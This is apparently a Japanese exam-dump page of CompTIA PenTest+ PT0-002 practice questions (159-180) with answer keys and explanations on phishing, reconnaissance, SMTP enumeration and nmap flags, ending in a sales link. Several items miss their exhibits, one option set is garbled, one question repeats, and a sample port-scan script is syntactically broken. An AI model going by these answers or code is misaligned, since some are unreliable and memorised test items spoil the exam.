リアルPT0-002問題集でCompTIA正確な解答2024年最新版を試そう [Q159-Q180]

リアルPT0-002問題集でCompTIA正確な解答2024年最新版を試そう

CompTIA PenTest+ PT0-002試験練習問題集

質問 # 159
A penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

• A. Familiarity and likeness
• B. Scarcity and fear
• C. Social proof and greed
• D. Authority and urgency

正解：D

質問 # 160
A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being transmitted?

• A. Decrypt the authorization header using bcrypt.
• B. Decode the authorization header using UTF-8.
• C. Decrypt the authorization header using AES.
• D. Decode the authorization header using Base64.

正解：D

質問 # 161
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?

• A. Ping of death
• B. Smurf
• C. Fraggle
• D. Ping flood

正解：C

解説：
Fraggle attack is same as a Smurf attack but rather than ICMP, UDP protocol is used. The prevention of these attacks is almost identical to Fraggle attack.
Ref: https://www.okta.com/identity-101/fraggle-attack/

質問 # 162
A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:

Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)

• A. Telnet
• B. HTTP
• C. SMTP
• D. SNMP
• E. NTP
• F. DNS

正解：B、F

質問 # 163
A penetration tester breaks into a company's office building and discovers the company does not have a shredding service. Which of the following attacks should the penetration tester try next?

• A. Shoulder surfing
• B. Tailgating
• C. Phishing
• D. Dumpster diving

正解：D

解説：
The penetration tester should try dumpster diving next, which is an attack that involves searching through trash bins or dumpsters for discarded documents or items that may contain sensitive or useful information. Dumpster diving can reveal information such as passwords, account numbers, credit card numbers, invoices, receipts, memos, contracts, or employee records. The penetration tester can use this information to gain access to systems or networks, impersonate users or employees, or perform social engineering attacks. The other options are not likely attacks that the penetration tester should try next based on the discovery that the company does not have a shredding service. Phishing is an attack that involves sending fraudulent emails that appear to be from legitimate sources to trick users into revealing their credentials or clicking on malicious links or attachments. Shoulder surfing is an attack that involves observing or spying on users while they enter their credentials or perform other tasks on their devices. Tailgating is an attack that involves following authorized personnel into a restricted area without proper authorization or identification.

質問 # 164
SIMULATION
Using the output, identify potential attack vectors that should be further investigated.

正解：

解説：
See explanation below.
Explanation:
1: Null session enumeration
Weak SMB file permissions
Fragmentation attack
2: nmap
-sV
-p 1-1023
192.168.2.2
3: #!/usr/bin/python
export $PORTS = 21,22
for $PORT in $PORTS:
try:
s.connect((ip, port))
print("%s:%s - OPEN" % (ip, port))
except socket.timeout
print("%:%s - TIMEOUT" % (ip, port))
except socket.error as e:
print("%:%s - CLOSED" % (ip, port))
finally
s.close()
port_scan(sys.argv[1], ports)

質問 # 165
A penetration tester gains access to a system and is able to migrate to a user process:

Given the output above, which of the following actions is the penetration tester performing? (Choose two.)

• A. Executing a file on the remote system
• B. Building a scheduled task for execution
• C. Adding an additional IP address on the compromised system
• D. Redirecting output from a file to a remote system
• E. Mapping a share to a remote system
• F. Creating a new process on all domain systems
• G. Setting up a reverse shell from a remote system

正解：A、E

解説：
Explanation
WMIC.exe is a built-in Microsoft program that allows command-line access to the Windows Management Instrumentation. Using this tool, administrators can query the operating system for detailed information about installed hardware and Windows settings, run management tasks, and even execute other programs or commands.

質問 # 166
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

• A. Injection flaws
• B. Race-condition attacks
• C. Buffer overflows
• D. Zero-day attacks
• E. Ransomware attacks
• F. Cross-site scripting

正解：A、F

解説：
A01-Injection
A02-Broken Authentication
A03-Sensitive Data Exposure
A04-XXE
A05-Broken Access Control
A06-Security Misconfiguration
A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities
A10-Insufficient Logging & Monitoring
Reference:
Cross-site scripting (XSS) and injection flaws are two of the web-application security risks that are part of the OWASP Top 10 v2017 list. XSS is a type of attack that injects malicious scripts into web pages or applications that are viewed by other users, resulting in compromised sessions, stolen cookies, or redirected browsers. Injection flaws are a type of attack that exploits a vulnerability in an application's data input or output, such as SQL injection, command injection, or LDAP injection, resulting in unauthorized access, data loss, or remote code execution. The other options are not part of the OWASP Top 10 v2017 list.

質問 # 167
When
accessing the URL http://192.168.0-1/validate/user.php, a penetration tester obtained the following output:
..d index: eid in /apache/www/validate/user.php line 12
..d index: uid in /apache/www/validate/user.php line 13
..d index: pw in /apache/www/validate/user.php line 14
..d index: acl in /apache/www/validate/user.php line 15

• A. Incorrect command syntax
• B. Insufficient error handling
• C. Insecure data transmission
• D. Lack of code signing

正解：B

解説：
The most probable cause for this output is insufficient error handling, which is a coding flaw that occurs when a program does not handle errors or exceptions properly or gracefully. Insufficient error handling can result in unwanted or unexpected behavior, such as crashes, hangs, or leaks. In this case, the output shows that the program is displaying warning messages that indicate undefined indexes in the user.php file. These messages reveal the names of the variables and the file path that are used by the program, which can expose sensitive information or clues to an attacker. The program should have implemented error handling mechanisms, such as try-catch blocks, error logging, or sanitizing output, to prevent these messages from being displayed or to handle them appropriately. The other options are not plausible causes for this output. Lack of code signing is a security flaw that occurs when a program does not have a digital signature that verifies its authenticity and integrity. Incorrect command syntax is a user error that occurs when a command is entered with wrong or missing parameters or options. Insecure data transmission is a security flaw that occurs when data is sent over a network without encryption or protection.

質問 # 168
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

• A. As proof in case they are discovered
• B. As backup in case the original documents are lost
• C. To guide them through the building entrances
• D. To validate the billing information with the client

正解：A

質問 # 169
A company recently moved its software development architecture from VMs to containers. The company has asked a penetration tester to determine if the new containers are configured correctly against a DDoS attack. Which of the following should a tester perform first?

• A. Determine if security tokens are easily available.
• B. Perform a vulnerability check against the hypervisor.
• C. Test the strength of the encryption settings.
• D. .Scan the containers for open ports.

正解：D

解説：
The first step that a tester should perform to determine if the new containers are configured correctly against a DDoS attack is to scan the containers for open ports. Open ports are entry points for network communication and can expose services or applications that may be vulnerable to DDoS attacks. Scanning the containers for open ports can help the tester identify which services or applications are running on the containers, and which ones may need to be secured or disabled to prevent DDoS attacks. Scanning the containers for open ports can also help the tester discover any unauthorized or malicious services or applications that may have been installed on the containers by previous attackers or compromised containers. Scanning the containers for open ports can be done by using tools such as Nmap, which can perform network scanning and enumeration by sending packets to hosts and analyzing their responses1. The other options are not the first steps that a tester should perform to determine if the new containers are configured correctly against a DDoS attack. Testing the strength of the encryption settings is not relevant to DDoS attacks, as encryption does not prevent or mitigate DDoS attacks, but rather protects data confidentiality and integrity. Determining if security tokens are easily available is not relevant to DDoS attacks, as security tokens are used for authentication and authorization, not for preventing or mitigating DDoS attacks. Performing a vulnerability check against the hypervisor is not relevant to DDoS attacks, as the hypervisor is not directly exposed to network traffic, but rather manages the virtual machines or containers that run on it.

質問 # 170
During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data?

• A. Intrusion detection
• B. System hardening
• C. Vulnerability scanning
• D. Network segmentation

正解：D

解説：
Network segmentation is the practice of dividing a network into smaller subnetworks or segments based on different criteria, such as function, security level, or access control. Network segmentation can enhance the security of a network by isolating sensitive or critical systems from less secure or untrusted systems, reducing the attack surface, limiting the spread of malware or intrusions, and enforcing granular policies and rules for each segment. To be PCI compliant, which is a set of standards for protecting payment card data, the company should have implemented network segmentation to separate the servers that perform financial transactions from other parts of the network that may be less secure or more exposed to threats. The other options are not specific requirements for PCI compliance, although they may be good security practices in general.

質問 # 171
A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client. Which of the following happens NEXT?

• A. The penetration tester deletes all scripts from the client machines.
• B. The client clears system logs generated during the test.
• C. The client applies patches to the systems.
• D. The penetration tester conducts a retest.

正解：C

質問 # 172
A penetration tester is conducting an unknown environment test and gathering additional information that can be used for later stages of an assessment. Which of the following would most likely produce useful information for additional testing?

• A. Searching for code repositories target company's organization
• B. Searching for code repositories associated with a developer who previously worked for the target company code repositories associated with the
• C. Searching for code repositories associated with a developer who previously worked for the target company
• D. Searching for code repositories associated with the target company's organization

正解：A

解説：
Code repositories are online platforms that store and manage source code and other files related to software development projects. Code repositories can contain useful information for additional testing, such as application names, versions, features, functions, vulnerabilities, dependencies, credentials, comments, or documentation. Searching for code repositories associated with the target company's organization would most likely produce useful information for additional testing, as it would reveal the software projects that the target company is working on or using, and potentially expose some weaknesses or flaws that can be exploited. Code repositories can be searched by using tools such as GitHub, GitLab, Bitbucket, or SourceForge1. The other options are not as likely to produce useful information for additional testing, as they are not directly related to the target company's software development activities. Searching for code repositories associated with a developer who previously worked for the target company may not yield any relevant or current information, as the developer may have deleted, moved, or updated their code repositories after leaving the company. Searching for code repositories associated with the target company's competitors or customers may not yield any useful or accessible information, as they may have different or unrelated software projects, or they may have restricted or protected their code repositories from public view.

質問 # 173
During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

• A. NDA
• B. ROE.
• C. SLA.
• D. SOW.

正解：B

解説：
Explanation
https://mainnerve.com/what-are-rules-of-engagement-in-pen-testing/#:~:text=The%20ROE%20includes%20the%

質問 # 174
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

• A. nmap192.168.1.1-5-PA22-25,80
• B. nmap192.168.1.1-5-PS22-25,80
• C. nmap192.168.1.1-5-PU22-25,80
• D. nmap192.168.1.1-5-Ss22-25,80

正解：B

解説：
Explanation
PS/PA/PU/PY are host discovery flags which use TCP SYN/ACK, UDP or SCTP discovery respectively. And since the ports in the options are mostly used by TCP protocols, then it's either the PS or PA flag. But since we need to know if the ports are live, sending SYN packet is a better alternative. Hence, I choose PS in this case.

質問 # 175
During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred?

• A. The scanner crashed the system.
• B. The SSL certificates were invalid.
• C. The tester IP was blocked.
• D. The web page was not found.

正解：C

質問 # 176
A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras.
Which of the following is a technique the tester can use to gain access to the IT framework without being detected?

• A. Pick a lock.
• B. Impersonate a package delivery worker.
• C. Disable the cameras remotely.
• D. Send a phishing email.

正解：B

質問 # 177
A penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

• A. Familiarity and likeness
• B. Scarcity and fear
• C. Social proof and greed
• D. Authority and urgency

正解：D

質問 # 178
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?

• A. VRFY and TURN
• B. RCPT TO and VRFY
• C. EXPN and TURN
• D. VRFY and EXPN

正解：D

解説：
The VRFY and EXPN commands can be used to enumerate user accounts on an SMTP server, as they are used to verify the existence of users or mailing lists. VRFY (verify) asks the server to confirm that a given user name or address is valid. EXPN (expand) asks the server to expand a mailing list into its individual members.
These commands can be used by a penetration tester to identify valid user names or e-mail addresses on the target SMTP server.

質問 # 179
A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted stone of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server. Which of the following is the
MOST likely reason for the error?

• A. TCP port 443 is not open on the firewall
• B. The application has the API certificate pinned.
• C. The API server is using SSL instead of TLS
• D. The tester is using an outdated version of the application

正解：B

質問 # 180
......

PT0-002試験合格を準備するため 今すぐ弊社のCompTIA PenTest+試験パッケージお試そう：https://www.jpntest.com/shiken/PT0-002-mondaishu